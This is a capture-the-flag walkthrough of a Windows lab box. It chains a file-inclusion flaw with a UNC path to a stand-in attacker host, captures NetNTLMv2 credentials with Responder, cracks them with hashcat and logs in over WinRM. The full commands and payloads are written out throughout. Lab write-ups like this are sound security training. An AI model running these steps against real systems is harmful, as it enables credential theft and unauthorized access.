⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

The Responder machine chains two techniques: a Local File Inclusion (LFI) that lets you make a Windows web application include a UNC path, which forces the server to open an outbound SMB connection, and Responder, which answers that connection and captures the NetNTLMv2 challenge-response the server sends while authenticating. The response is then cracked offline with hashcat. The chain (LFI → NTLM capture → offline crack → authenticated access) is initial access on this box, but the capture-and-crack step in the middle is the same one that drives credential theft and lateral movement on internal Windows networks.

Tools: nmap · responder · hashcat · evil-winrm  ·  Difficulty: Very Easy  ·  OS: Windows
01 — What You Will Learn
Skill | Why it matters
--- | ---
Local File Inclusion via URL parameter | LFI is a top web vuln, and on Windows it can trigger outbound authentication
Responder for NTLM capture | The most widely used tool for credential capture on internal Windows networks
NTLMv2 hash cracking with hashcat | Offline cracking against a wordlist, with no account lockout risk
WinRM access with evil-winrm | Remote PowerShell access once valid credentials are obtained
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT     STATE SERVICE   VERSION
80/tcp   open  http      Apache httpd 2.4.52 (Win64)
5985/tcp open  http      Microsoft HTTPAPI 2.0 (WinRM)
7680/tcp open  pando-pub?

What you're seeing: port 80 is the web app and port 5985 is WinRM (Windows Remote Management). WinRM on 5985 means that once you hold valid credentials you can get a remote PowerShell session via evil-winrm. Port 7680 is Windows Update Delivery Optimization; the "pando-pub?" label is only nmap's best guess from its service table and the port is not relevant here. The web app is the initial attack surface.

ℹ  WinRM port 5985 (HTTP) or 5986 (HTTPS) is a reliable lateral movement channel in Windows environments. It's the protocol that PowerShell remoting and evil-winrm use.
03 — Discovering the LFI

Browsing to port 80 shows a web application with a language selection feature. The URL reveals a page parameter loading files dynamically:

http://10.129.x.x/?page=french.html

This pattern, a parameter that includes a file by name, is a textbook LFI candidate. On Linux you would test for /etc/passwd; the Windows equivalent is C:\Windows\System32\drivers\etc\hosts, which confirms the include before you go further. Windows also offers a second option: point the parameter at a UNC path on your machine (//YOUR_IP/share), and the Windows SMB client will authenticate to you, with the account the web server runs as, before it ever reads a file.

04 — Capturing the NTLM Hash

Start Responder on your tun0 (VPN) interface first, then trigger the LFI with a UNC path pointing to your IP.

Step 1 — Start Responder
sudo responder -I tun0
Step 2 — Trigger the LFI with a UNC path
http://10.129.x.x/?page=//YOUR_IP/somefile

The web server tries to open the UNC path, and the Windows SMB client authenticates to Responder's SMB listener with the credentials of the account the web server process runs as. Responder issues its challenge and records the NetNTLMv2 response the server returns.

Responder output — hash captured
[SMB] NTLMv2-SSP Client   : 10.129.x.x
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:1122334455667788:B098A46B6027AC4C30B2B69D74C70B46:010100000000000...
ℹ  What Responder captured is a NetNTLMv2 challenge-response, not the NT hash. It is bound to the server challenge Responder issued (1122334455667788 is Responder's default challenge), so it cannot be replayed and cannot be used for pass-the-hash, which needs the NT hash itself. The options are to crack it offline, as below, or to relay the authentication live (for example with ntlmrelayx) to a host that does not enforce SMB signing, which is out of scope for this box.
05 — Cracking the Hash with Hashcat
Save the hash to a file
echo "Administrator::RESPONDER:1122334455667788:B098A46B..." > hash.txt
Crack with hashcat using rockyou.txt
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Cracked output
Administrator::RESPONDER:...:badminton

Session..........: hashcat
Status...........: Cracked
Hashcat flag | Meaning
--- | ---
-m 5600 | Hash type: NTLMv2 (NetNTLMv2)
-m 1000 | Hash type: NTLM (the NT hash used for pass-the-hash)
-a 0 | Attack mode: dictionary (default)
-a 3 | Attack mode: brute-force with mask
--show | Display previously cracked results from the potfile
06 — Gaining Access via WinRM
Connect with evil-winrm
evil-winrm -i 10.129.x.x -u Administrator -p badminton
Find the flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
✓ Submit the flag string to complete the machine.
07 — Key Takeaways
The LFI → Responder → hashcat → WinRM chain is one of the most instructive initial-access paths on a Windows target, and its middle step, capturing and cracking NetNTLMv2, recurs constantly in lateral movement on real networks. Each step is simple in isolation; the power is in chaining them together.
Concept | Real-world relevance
--- | ---
LFI + UNC path on Windows | The Windows SMB client authenticates automatically with the account the web server runs as; here that was Administrator, which is why the box falls so fast. A Linux server will not authenticate to a UNC path this way
Responder on internal networks | On a real internal assessment, Responder answers LLMNR, NBT-NS and mDNS name-resolution broadcasts (poisoning) so that hosts authenticate to it on their own, with no triggered LFI needed
Offline cracking has no lockout | Unlike online brute-force, offline cracking against rockyou.txt carries no account lockout risk, though NetNTLMv2 (-m 5600) cracks more slowly than a raw NT hash (-m 1000)
WinRM for post-exploitation | evil-winrm gives a full PowerShell prompt, the Windows equivalent of an SSH shell on Linux